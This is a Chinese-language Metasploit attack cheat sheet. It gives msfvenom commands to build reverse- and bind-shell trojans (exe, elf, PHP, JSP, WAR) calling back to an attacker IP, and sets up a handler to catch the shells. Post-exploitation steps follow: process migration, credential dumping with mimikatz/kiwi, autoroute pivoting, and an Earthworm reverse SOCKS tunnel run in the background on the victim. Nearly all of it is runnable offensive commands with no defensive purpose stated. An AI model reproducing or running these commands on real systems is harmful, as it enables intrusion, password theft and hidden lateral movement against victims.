一.使用msf生成各种类型payload
1.生成win的exe木马文件
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4433 -f exe >/root/muma.exe
2.生成linux的可执行文件
msfvenom -p linux/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4433 -f elf >/root/muma.elf
注:其中windows和linux后面都可以跟/x86和/x64 (x86是32位,x64是64位)
3.生成php文件的payload
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.10 LPORT=4433 -f raw > shell.php
4.生成jsp文件的payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.10 LPORT=4433 -f raw > shell.jsp
5.生成war文件的payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.10 LPORT=4433 -f war > shell.war
注:1.reverse_tcp为反向木马,受害机来主动连接我们kali攻击机,可以绕过防火墙
2.但是目标如果不出网或者在内网中就得使用正向木马(bind_tcp),因为受害机找不到我们kali攻击机
msfvenom -p windows/meterpreter/bind_tcp lhost=192.168.1.10 lport=4433 -f exe >/root/muma.exe
二.使用msfconsole来连接木马
1.首先启动msfconsole
root@kali:~# msfconsole
2.使用exploit/multi/handler
msf6 > use exploit/multi/handler
msf6 > show option
msf6 >set payload windows/meterpreter/reverse_tcp
msf6 >set lhost 192.168.1.10
msf6 >set lport 4433
msf6 >run
然后受害机执行木马就可以返回shll了
三.meterpre后渗透模块
1.
meterpreter>ipconfig
meterpreter>ps #查看进程
meterpreter>getuid #查看权限
meterpreter>migrate #迁移进程防止session掉线
meterpreter>load kiwi #导入mimikatz
meterpreter>kiwi_cmd privilege::debug #提取权限
meterpreter>kiwi_cmd sekurlsa::logonPasswords #获取密码
读取密码以后就可以进行内网渗透了
可以在msf本身开启代理,先添加路由
meterpreter > run post/multi/manage/autoroute
meterpreter >run autoroute -p #查看全部路由
可以选择直接在msf里开启socks4代理,msf本身的socks5有bug,不好用
个人建议选择第二种,上传Earthworm (EW)代理,先在kali执行
1.
./ew_for_linux64 -s rcsocks -l 1080 -e 1234
2.在目标机器执行
./ew_for_linux64 -s rssocks -d 192.168.1.10 -e 1234
在后台执行,即使shell掉了也执行
nohup ./ew_for_linux64 -s rssocks -d 192.168.1.10 -e 1234 &
192.168.1.10为kali的ip
3.在kali修改proxychains4配置
vim /etc/proxychains4.conf
修改成一下配置
接下来可以执行代理全局shell,kali执行
root@kali:~# proxychains4 bash #开启全局shell
可以在这个shell里面执行nmap等命令